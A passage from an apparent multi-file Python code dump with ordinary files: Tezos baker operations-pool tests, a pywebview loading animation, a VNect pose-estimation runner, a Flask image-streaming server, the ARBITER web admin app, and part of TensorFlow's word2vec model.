return all(map(lambda x: x[0] == 0 or len(x[1]) == 0, enumerate(lls)))
def mempool_to_operations(mempool):
def to_op(applied_op):
operation = {}
operation['branch'] = applied_op['branch']
operation['contents'] = applied_op['contents']
operation['signature'] = applied_op['signature']
return operation
return [to_op(applied_op) for applied_op in mempool['applied']]
def get_operations(client: Client) -> List[dict]:
return mempool_to_operations(client.get_mempool())
class TestExternalOperations:
def test_bake_empty_operations_file(self, client: Client):
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
get_filename(EMPTY_OPERATIONS),
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert all_empty(head['operations'])
# http_server is a fixture that auto- runs and closes said HTTP server
# pylint: disable=W0613
def test_bake_empty_operations_http(self, client: Client, http_server):
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"http://localhost:{PORT}/{get_filename(EMPTY_OPERATIONS)}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
def test_bake_absent_operations_file(self, client: Client):
"""The absent resource should simply be ignored."""
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"{ABSENT_OPERATIONS}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
# pylint: disable=W0613
def test_bake_absent_operations_http(self, client: Client, http_server):
"""The absent resource should simply be ignored."""
level = client.get_level()
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
# any fake URL would do here
f"http://localhost:{PORT}/{ABSENT_OPERATIONS}",
],
)
assert client.get_level() == level + 1
head = client.get_head()
assert only_has_endorsements(head['operations'])
def test_bake_singleton_operations_file_pre(
self, client: Client, session: dict
):
"""Construct a transaction over the current state, and bake it.
Store it into the context to serves as a dynamic oracle for the next
steps.
"""
sender = 'bootstrap2'
balance0 = client.get_mutez_balance(sender)
session['amount'] = 2
client.transfer(session['amount'], sender, 'bootstrap3')
# Baking
utils.bake(client, bake_args=['--minimal-timestamp'])
balance1 = client.get_mutez_balance(sender)
session['difference'] = balance0 - balance1
assert session['difference'] >= session['amount']
utils.bake(client)
def test_bake_singleton_operations_file(
self, client: Client, session: dict
):
"""Construct a transaction over the current state, put it into a file,
and bake it into the chain through --operations-pool option.
This additionally compares the balance to a normal transfer (through the
node's mempool) to check that there is no observable difference in
behaviors between passing through a node's mempool or a hand-rolled
operations file.
"""
sender = 'bootstrap4'
balance0 = client.get_mutez_balance(sender)
client.transfer(session['amount'], sender, 'bootstrap3')
pending_ops = get_operations(client)
assert len(pending_ops) == 1
assert len(pending_ops[0]['contents']) == 1
# Write the transaction to a file
file = get_filename(SINGLETON_OPERATIONS)
with open(file, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
# Baking
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
file,
'--ignore-node-mempool',
],
)
balance1 = client.get_mutez_balance(sender)
assert balance0 - balance1 == session['difference']
# cleanup the generated file
os.remove(file)
# pylint: disable=W0613
def test_bake_singleton_operations_http(
self, client: Client, sandbox: Sandbox, session: dict, http_server
):
# Restart
sandbox.node(0).terminate()
sandbox.node(0).run()
client.check_node_listening()
sender = 'bootstrap2'
balance0 = client.get_mutez_balance(sender)
client.transfer(session['amount'], sender, 'bootstrap3')
pending_ops = get_operations(client)
assert len(pending_ops) == 1
assert len(pending_ops[0]['contents']) == 1
# Write the transaction to a file
file = get_filename(SINGLETON_OPERATIONS)
with open(file, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
utils.bake(
client,
bake_args=[
'--minimal-timestamp',
"--operations-pool",
f"http://localhost:{PORT}/{file}",
'--ignore-node-mempool',
],
)
sandbox.client(0).rpc('get', '/chains/main/blocks/head')
balance1 = client.get_mutez_balance(sender)
assert balance0 - balance1 == session['difference']
# cleanup the generated file
os.remove(file)
# The 5 bootstrap accounts
ALL_BOOTSTRAP_ACCOUNTS = [f'bootstrap{i + 1}' for i in range(5)]
@pytest.mark.incremental
class TestBakerExternalOperations:
"""Test adding an external operations source (file) {}to a baker daemon"""
def test_init(self, sandbox: Sandbox):
sandbox.add_node(0, params=constants.NODE_PARAMS)
parameters = protocol.get_parameters()
parameters['minimal_block_delay'] = "1"
parameters["delay_increment_per_round"] = "1"
protocol.activate(
sandbox.client(0),
parameters=parameters,
activate_in_the_past=False,
)
def test_gen_operations(self, sandbox: Sandbox, session: dict):
"""Generate a transfer operation and save it to a file"""
client = sandbox.client(0)
client.multibake(args=['--minimal-timestamp'])
client.transfer(3, 'bootstrap1', 'bootstrap3')
client.multibake(args=['--minimal-timestamp'])
client.multibake(args=['--minimal-timestamp'])
# We are now at level 2, next block at level 4
level = client.get_level()
session['level'] = level
assert level == 4
assert len(get_operations(client)) == 0
time.sleep(3)
session['transfer_value'] = 2
client.transfer(session['transfer_value'], 'bootstrap1', 'bootstrap3')
pending_ops = get_operations(client)
# Write the transaction to a file
filename = get_filename(SINGLETON_OPERATIONS)
session['operations_file'] = filename
with open(filename, 'w') as fdesc:
fdesc.write(json.dumps(pending_ops))
def test_terminate_sandbox(self, sandbox: Sandbox):
"""Cleanup the node's mempool. Forget about the last transfer"""
sandbox.node(0).terminate()
# let the node end gracefully before restarting
time.sleep(1)
def test_baker(self, sandbox: Sandbox, session: dict):
"""Restart the node and add a baker daemon"""
sandbox.node(0).run()
assert sandbox.client(0).check_node_listening()
assert os.path.isfile(session['operations_file'])
sandbox.add_baker(
0,
ALL_BOOTSTRAP_ACCOUNTS,
proto=protocol.DAEMON,
log_levels=constants.TENDERBAKE_BAKER_LOG_LEVELS,
run_params=[
'--operations-pool',
session['operations_file'],
'--liquidity-baking-toggle-vote',
'pass',
],
)
@pytest.mark.timeout(30)
def test_wait_until_high_enough_level(
self, sandbox: Sandbox, session: dict
):
"""Wait until we have seen enough blocks.
This should not take much time."""
while sandbox.client(0).get_level() < 2 * session['level']:
time.sleep(1)
def test_check_block_baked(self, sandbox: Sandbox, session: dict):
"""Check that block exactly contains the operations that we put into
our operations file"""
expected_level = session['level']
block = sandbox.client(0).rpc(
'get', f'/chains/main/blocks/{expected_level}'
)
manager_ops = block['operations'][3]
assert len(manager_ops) == 1
assert int(
manager_ops[0]['contents'][0]['amount']
) == utils.mutez_of_tez(session['transfer_value'])
def test_check_block_after_baked(self, sandbox: Sandbox, session: dict):
"""Check that block is empty of operations"""
level = session['level'] + 1
block = sandbox.client(0).rpc('get', f'/chains/main/blocks/{level}')
assert only_has_endorsements(block['operations'])
# cleanup the operation file
os.remove(session['operations_file'])
|
loading_animation.py
|
import webview
import threading
"""
This example demonstrates a simple loading animation workflow
"""
def load_html():
webview.load_html("""
<style>
body {
background-color: #333;
color: white;
font-family: Helvetica Neue, Helvetica, Arial, sans-serif;
}
.main-container {
width: 100%;
height: 90vh;
display: flex;
display: -webkit-flex;
align-items: center;
-webkit-align-items: center;
justify-content: center;
-webkit-justify-content: center;
overflow: hidden;
}
.loading-container {
}
.loader {
font-size: 10px;
margin: 50px auto;
text-indent: -9999em;
width: 3rem;
height: 3rem;
border-radius: 50%;
background: #ffffff;
background: -moz-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: -webkit-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: -o-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: -ms-linear-gradient(left, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
background: linear-gradient(to right, #ffffff 10%, rgba(255, 255, 255, 0) 42%);
position: relative;
-webkit-animation: load3 1.4s infinite linear;
animation: load3 1.4s infinite linear;
-webkit-transform: translateZ(0);
-ms-transform: translateZ(0);
transform: translateZ(0);
}
.loader:before {
width: 50%;
height: 50%;
background: #ffffff;
border-radius: 100% 0 0 0;
position: absolute;
top: 0;
left: 0;
content: '';
}
.loader:after {
background: #333;
width: 75%;
height: 75%;
border-radius: 50%;
content: '';
margin: auto;
position: absolute;
top: 0;
left: 0;
bottom: 0;
right: 0;
}
@-webkit-keyframes load3 {
0% {
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
100% {
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@keyframes load3 {
0% {
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
100% {
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
.loaded-container {
display: none;
}
</style>
<body>
<div class="main-container">
<div id="loader" class="loading-container">
<div class="loader">Loading...</div>
</div>
<div id="main" class="loaded-container">
<h1>Content is loaded!</h1>
</div>
</div>
<script>
setTimeout(function() {
document.getElementById('loader').style.display = 'none'
document.getElementById('main').style.display = 'block'
}, 5000)
</script>
</body>
""")
if __name__ == '__main__':
t = threading.Thread(target=load_html)
t.start()
webview.create_window('Background color', background_color='#333333')
|
run_estimator_ps.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import cv2
import time
import numpy as np
import multiprocessing as mp
from src import utils
from src.hog_box import HOGBox
from src.estimator import VNectEstimator
##################
### Parameters ###
##################
# the input camera serial number in the PC (int), or PATH to input video (str)
# video = 0
video = './pic/test_video.mp4'
# whether apply transposed matrix (when camera is flipped)
# T = True
T = False
# vnect input image size
box_size = 368
# parent joint indexes of each joint (for plotting the skeletal lines)
joint_parents = [16, 15, 1, 2, 3, 1, 5, 6, 14, 8,
9, 14, 11, 12, 14, 14, 1, 4, 7, 10,
13]
#######################
### Initializations ###
#######################
def init():
# initialize VNect estimator
global estimator
estimator = VNectEstimator()
# catch the video stream
global camera_capture
camera_capture = cv2.VideoCapture(video)
assert camera_capture.isOpened(), 'Video stream not opened: %s' % str(video)
global W_img, H_img
W_img, H_img = (int(camera_capture.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(camera_capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
################
### Box Loop ###
################
# use a simple HOG method to initialize bounding box
def hog_box():
hog = HOGBox()
## click the mouse when ideal bounding box appears ##
success, frame = camera_capture.read()
# initialize bounding box as the maximum rectangle
rect = [0, 0, W_img, H_img]
while success and cv2.waitKey(1) == -1:
if T:
# if not calling .copy(), an unexpected bug occurs
# mirror
# frame = np.transpose(frame, axes=[1, 0, 2]).copy()
# no mirror
frame = np.rot90(frame, 3).copy()
choose, rect = hog(frame)
if choose:
break
success, frame = camera_capture.read()
# return the bounding box params (x, y, w, h)
return rect
#################
### Main Loop ###
#################
## trigger any keyboard events to stop the loop ##
def main(q_start3d, q_joints):
init()
x, y, w, h = hog_box()
q_start3d.put(True)
success, frame = camera_capture.read()
while success and cv2.waitKey(1) == -1:
if T:
# mirror
# frame = np.transpose(frame, axes=[1, 0, 2])
# no mirror
frame = np.rot90(frame, 3)
# crop bounding box from the raw frame
frame_cropped = frame[y:y + h, x:x + w, :]
# vnect estimation
joints_2d, joints_3d = estimator(frame_cropped)
q_joints.put(joints_3d)
# 2d plotting
joints_2d[:, 0] += y
joints_2d[:, 1] += x
frame_draw = utils.draw_limbs_2d(frame.copy(), joints_2d, joint_parents, [x, y, w, h])
frame_draw = utils.img_scale(frame_draw, 1024 / max(W_img, H_img))
cv2.imshow('2D Prediction', frame_draw)
# update bounding box
y_min = (np.min(joints_2d[:, 0]))
y_max = (np.max(joints_2d[:, 0]))
x_min = (np.min(joints_2d[:, 1]))
x_max = (np.max(joints_2d[:, 1]))
buffer_x = 0.8 * (x_max - x_min + 1)
buffer_y = 0.2 * (y_max - y_min + 1)
x, y = (max(int(x_min - buffer_x / 2), 0),
max(int(y_min - buffer_y / 2), 0))
w, h = (int(min(x_max - x_min + buffer_x, W_img - x)),
int(min(y_max - y_min + buffer_y, H_img - y)))
# update frame
success, frame = camera_capture.read()
# angles_file.close()
try:
camera_capture.release()
cv2.destroyAllWindows()
except Exception as e:
print(e)
raise
if __name__ == '__main__':
q_start3d = mp.Queue()
q_joints = mp.Queue()
ps_main = mp.Process(target=main, args=(q_start3d, q_joints))
ps_plot3d = mp.Process(target=utils.plot_3d,
args=(q_start3d, q_joints, joint_parents),
daemon=True)
ps_main.start()
ps_plot3d.start()
ps_main.join()
|
web_server.py
|
import Queue
import io
import logging
import threading
import PIL.Image
import pika
from flask import Flask, Response
import config
logging.basicConfig(level=logging.INFO)
app = Flask(__name__)
queue = Queue.Queue(1)
def populate_queue():
def callback(ch, method, properties, body):
image_stream = io.BytesIO()
image_stream.write(body)
image_stream.seek(0)
image = PIL.Image.open(image_stream)
image.verify()
image_stream.seek(0)
queue.put(image_stream)
queue_channel.basic_consume(callback, queue=queue_name, no_ack=True)
queue_channel.start_consuming()
def generate():
while True:
image_stream = queue.get()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + image_stream.read() + b'\r\n')
@app.route('/')
def index():
print 'Connected client on thread:', threading.current_thread().name
return Response(generate(), mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == "__main__":
print 'Connecting to queue server'
queue_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=config.get('queue_server_host'), port=int(config.get('queue_server_port'))))
queue_channel = queue_connection.channel()
queue_channel.exchange_declare(exchange='images', exchange_type='fanout')
result = queue_channel.queue_declare(exclusive=True)
queue_name = result.method.queue
queue_channel.queue_bind(exchange='images', queue=queue_name)
socket_server_thread = threading.Thread(target=populate_queue)
socket_server_thread.daemon = True
socket_server_thread.start()
try:
print 'Started web server on main thread:', threading.current_thread().name
app.run(host=config.get('web_server_host'), port=int(config.get('web_server_port')), threaded=True, debug=False)
except KeyboardInterrupt:
pass
print 'Closing queue connection'
queue_connection.close()
|
web.py
|
"""
ARBITER.
▄▄▄ ██▀███ ▄▄▄▄ ██▓▄▄▄█████▓▓█████ ██▀███
▒████▄ ▓██ ▒ ██▒▓█████▄ ▓██▒▓ ██▒ ▓▒▓█ ▀ ▓██ ▒ ██▒
▒██ ▀█▄ ▓██ ░▄█ ▒▒██▒ ▄██▒██▒▒ ▓██░ ▒░▒███ ▓██ ░▄█ ▒
░██▄▄▄▄██ ▒██▀▀█▄ ▒██░█▀ ░██░░ ▓██▓ ░ ▒▓█ ▄ ▒██▀▀█▄
▓█ ▓██▒░██▓ ▒██▒░▓█ ▀█▓░██░ ▒██▒ ░ ░▒████▒░██▓ ▒██▒
▒▒ ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▓ ▒ ░░ ░░ ▒░ ░░ ▒▓ ░▒▓░
▒ ▒▒ ░ ░▒ ░ ▒░▒░▒ ░ ▒ ░ ░ ░ ░ ░ ░▒ ░ ▒░
░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░
Made by perpetualCreations
web.py, handles running the web management application.
"""
import configparser
import json
import threading
from os import urandom
from ast import literal_eval
from hashlib import sha3_512
from datetime import datetime, timezone
import flask
import flask_login
import flask_socketio
import swbs
config = configparser.ConfigParser()
config.read("/etc/ARBITER/web.cfg")
arbiter_config = configparser.ConfigParser()
arbiter_config.read("/etc/ARBITER/init.cfg")
application = flask.Flask(__name__)
application.secret_key = urandom(4096)
login_manager = flask_login.LoginManager()
login_manager.init_app(application)
login_manager.login_view = "login"
users = {"username": "admin"}
socket_io = flask_socketio.SocketIO(application)
# all error messages get appended to this list, new clients will receive all
# error messages in list, to "catch them up"
errors: list = []
# dictionary overwritten when the directives database dispatches an update,
# sent to new clients instead of fetching database contents again
directives_database_cache: dict = {}
@socket_io.on("logError")
def log_error_broadcaster(message: str):
"""Emit event logError to all clients as a broadcast."""
error = {"timestamp":
datetime.utcnow().replace(tzinfo=timezone.utc).isoformat(),
"message": message}
errors.append(error)
with application.app_context():
flask_socketio.emit("logError", error, json=True, broadcast=True,
namespace="/")
class User(flask_login.UserMixin):
"""Flask user model."""
@login_manager.user_loader
def user_loader(user_id) -> User:
"""Flask Login function required for loading the admin user."""
user = User()
# pylint: disable=attribute-defined-outside-init
# pylint: disable=invalid-name
user.id = user_id
return user
@socket_io.on("connect")
def connect_handler() -> any:
"""Handle websocket connections, checking for login auth."""
if flask_login.current_user.is_authenticated is not True:
return False
else:
with application.app_context():
for error in errors:
flask_socketio.emit("logError", error, json=True)
flask_socketio.emit("eventUpdate", directives_database_cache,
json=True)
class InterfaceClient(swbs.Client):
"""Socket interface instance class."""
def __init__(self, host, port, key, key_is_path):
"""Class initialization."""
super().__init__(host, port, key, key_is_path)
self.dead = False
def connect_wrapper(self) -> None:
"""
Serve as a wrapper for swbs.Client.connect.
Has additional calls to specify ARIA protocol.
"""
# pylint: disable=broad-except
try:
self.connect()
type_request = self.receive()
if type_request == "REQUEST TYPE":
self.send("FORESIGHT")
if self.receive() == "ABORT":
self.disconnect()
error_string = "Host " + self.host + " raised ABORT. " + \
"Interface client will shutdown."
self.dead = True
else:
InterfaceClient.send(self, "KEYERROR")
InterfaceClient.disconnect()
error_string = "Host " + self.host + \
" failed to send host request type, expected " + \
'"REQUEST TYPE"' + ", got " + type_request + "." + \
" Interface client will shutdown."
print(error_string)
log_error_broadcaster(error_string)
self.dead = True
except BaseException as parent_exception:
error_string = "Failed to initialize interface host " + \
"connecting to " + self.host + " on port " + str(self.port) + \
". Interface client will shutdown."
print(str(parent_exception) + " -> " + error_string)
log_error_broadcaster(error_string)
self.dead = True
def update_listener() -> None:
"""Thread for update events issued by the main ARBITER server."""
# probably a warcrime
# pylint: disable=global-statement
# pylint: disable=invalid-name
global directives_database_cache
set_update = False
arbiter_updater_interface = \
InterfaceClient("127.0.0.1", arbiter_config["server"]["port"],
arbiter_config["security"]["key"],
arbiter_config["security"]["key_is_path"])
while arbiter_updater_interface.dead is \
False:
while flask_login.current_user is None:
pass
if set_update is False:
arbiter_updater_interface.send("UPDATE")
if arbiter_updater_interface.receive() == "OK":
set_update = True
continue
else:
error_string = "Host does not support event updating, " + \
"any display elements in the interfacce will not " + \
"update. Exiting listener."
print(error_string)
log_error_broadcaster(error_string)
return None
update_header_data = arbiter_updater_interface.receive().split(" ")
if len(update_header_data) == 2 and \
update_header_data[1] in ["STATE", "TABLE"]:
arbiter_updater_interface.send("OK")
update_content_data = \
arbiter_updater_interface.receive()
if update_header_data[1] == "TABLE":
# pylint: disable=broad-except
try:
update_content_data = literal_eval(update_content_data)
except BaseException as parent_exception:
error_string = "Table data could not be interpreted, " + \
"raised exception: " + str(parent_exception)
print(error_string)
log_error_broadcaster(error_string)
return None
directives_database_cache = {"data": update_content_data,
"id": update_header_data[0],
"type": update_header_data[1]}
with application.app_context():
flask_socketio.emit("eventUpdate", directives_database_cache,
json=True, broadcast=True)
arbiter_updater_interface.send("OK")
else:
arbiter_updater_interface.send("KEYERROR")
error_string = "Received update with invalid header, content: " + \
str(update_header_data)
print(error_string)
log_error_broadcaster(error_string)
# interface inits
threading.Thread(target=update_listener, args=()).start()
arbiter_command_interface = \
InterfaceClient("127.0.0.1", arbiter_config["server"]["port"],
arbiter_config["security"]["key"],
arbiter_config["security"]["key_is_path"])
arbiter_command_interface_lock = threading.Lock()
@socket_io.on("command")
def command_handler(json_payload) -> None:
"""Handle websocket command request events from clients."""
json_payload = str(json_payload).replace("'", '"')
command_payload = json.loads(json_payload)
if arbiter_command_interface.dead is True:
return None
arbiter_command_interface_lock.acquire(True)
if command_payload["requestType"] == "SIGNAL":
arbiter_command_interface.send(command_payload["command"])
elif command_payload["requestType"] == "PAYLOAD":
arbiter_command_interface.send(command_payload["command"])
if arbiter_command_interface.receive() == "KEYERROR":
error_string = "Payload command " + \
command_payload["command"] + " is invalid."
print(error_string)
log_error_broadcaster(error_string)
arbiter_command_interface_lock.release()
return None
arbiter_command_interface.send(command_payload["payload"])
else:
error_string = "Received invalid requestType, expected " + \
'"SIGNAL" or "PAYLOAD", got ' + \
command_payload["requestType"] + ". Request ignored."
print(error_string)
log_error_broadcaster(error_string)
arbiter_command_interface_lock.release()
@application.route("/")
@flask_login.login_required
def index() -> any:
"""
Render index.html when root is requested.
Serves as homepage with control panels.
Requires login.
:return: any
"""
return flask.render_template("index.html", serverid=config["CORE"]["ID"])
@application.route("/password/", methods=["GET", "POST"])
@flask_login.login_required
def change_password() -> any:
"""
Render change_password.html when requested with GET.
Serves as utility page for changing the admin password.
Validates and commits password change when requested with POST.
Re-renders page with an error message if re-typed password is different.
Requires login.
:return: any
"""
if flask.request.method == "GET":
return flask.render_template("change_password.html",
serverid=config["CORE"]["ID"], error="")
elif flask.request.method == "POST":
if flask.request.form["password"] == \
flask.request.form["password_affirm"]:
config["CORE"]["PASSWORD"] = sha3_512(
flask.request.form["password"].encode("ascii")).hexdigest()
with open("main.cfg", "wb") as config_overwrite:
config.write(config_overwrite)
return flask.redirect(flask.url_for("index"))
else:
return flask.render_template(
"change_password.html", serverid=config["CORE"]["ID"],
error="Passwords don't match.", form=flask.request.form)
else:
flask.abort(405)
@application.route("/login/", methods=["GET", "POST"])
def login() -> any:
"""
Render login.html when requested with GET.
Serves as login page for users to authenticate themselves.
Validates password submissions when requested with POST,
and redirects to root.
Re-renders page with an error message if password is invalid
when compared to hash.
:return: any
"""
if flask.request.method == "GET":
if flask_login.current_user.is_authenticated is True:
return flask.redirect(flask.url_for("index"))
else:
return flask.render_template("login.html",
serverid=config["CORE"]["ID"],
error="")
elif flask.request.method == "POST":
if sha3_512(flask.request.form["password"].encode("ascii", "replace")
).hexdigest() == config["CORE"]["PASSWORD"]:
user = User()
# pylint: disable=attribute-defined-outside-init
user.id = users["username"]
flask_login.login_user(user)
return flask.redirect(flask.url_for("index"))
else:
return flask.render_template("login.html",
serverid=config["CORE"]["ID"],
error="Invalid password.")
else:
flask.abort(405)
@application.route("/logout/")
@flask_login.login_required
def logout() -> any:
"""
Log out user session, and redirect to login page.
Requires login.
:return: any
"""
flask_login.logout_user()
return flask.redirect(flask.url_for("login"))
if __name__ == "__main__":
socket_io.run(application, debug=literal_eval(config["CORE"]["DEBUG"]),
port=int(config["NET"]["PORT"]), use_reloader=False)
|
word2vec_optimized.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-threaded word2vec unbatched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does true SGD (i.e. no minibatching). To do this efficiently, custom
ops are used to sequentially process data within a 'batch'.
The key ops used are:
* skipgram custom op that does input processing.
* neg_train custom op that efficiently calculates and applies the gradient using
true SGD.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import threading
import time
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model.")
flags.DEFINE_string(
"train_data", None,
"Training data. E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "Analogy questions. "
"See README.md for how to get 'questions-words.txt'.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.025, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 25,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 500,
"Numbers of training examples each step processes "
"(no minibatching).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy(b'france', b'paris', b'russia') and "
"model.nearby([b'proton', b'elephant', b'maxwell'])")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# Where to write out summaries.
self.save_path = FLAGS.save_path
if not os.path.exists(self.save_path):
os.makedirs(self.save_path)
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
def read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data, "rb") as analogy_f:
for line in analogy_f:
if line.startswith(b":"): # Skip comments.
continue
words = line.strip().lower().split(b" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print("Eval analogy file: ", self._options.eval_data)
print("Questions: ", len(questions))
print("Skipped: ", questions_skipped)
self._analogy_questions = np.array(questions, dtype=np.int32)
def build_graph(self):
"""Build the model graph."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, current_epoch, total_words_processed,
examples, labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print("Data file: ", opts.train_data)
print("Vocab size: ", opts.vocab_size - 1, " + UNK")
print("Words per epoch: ", opts.words_per_epoch)
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
# Declare all variables we need.
# Input words embedding: [vocab_size, emb_dim]
w_in = tf.Variable(
tf.random_uniform(
[opts.vocab_size,
opts.emb_dim], -0.5 / opts.emb_dim, 0.5 / opts.emb_dim),
name="w_in")
# Global step: scalar, i.e., shape [].
w_out = tf.Variable(tf.zeros([opts.vocab_size, opts.emb_dim]), name="w_out")
# Global step: []
global_step = tf.Variable(0, name="global_step")
# Linear learning rate decay.
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001,
1.0 - tf.cast(total_words_processed, tf.float32) / words_to_train)
# Training nodes.
inc = global_step.assign_add(1)
with tf.control_dependencies([inc]):
train = word2vec.neg_train(w_in,
w_out,
examples,
labels,
lr,
vocab_count=opts.vocab_counts.tolist(),
num_negative_samples=opts.num_samples)
self._w_in = w_in
self._examples = examples
self._labels = labels
self._lr = lr
self._train = train
self.global_step = global_step
self._epoch = current_epoch
self._words = total_words_processed
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
vocab_word = tf.compat.as_text(opts.vocab_words[i]).encode("utf-8")
f.write("%s %d\n" % (vocab_word,
opts.vocab_counts[i]))
def build_eval_graph(self):
"""Build the evaluation graph."""
# Eval graph
opts = self._options
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._w_in, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, opts.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
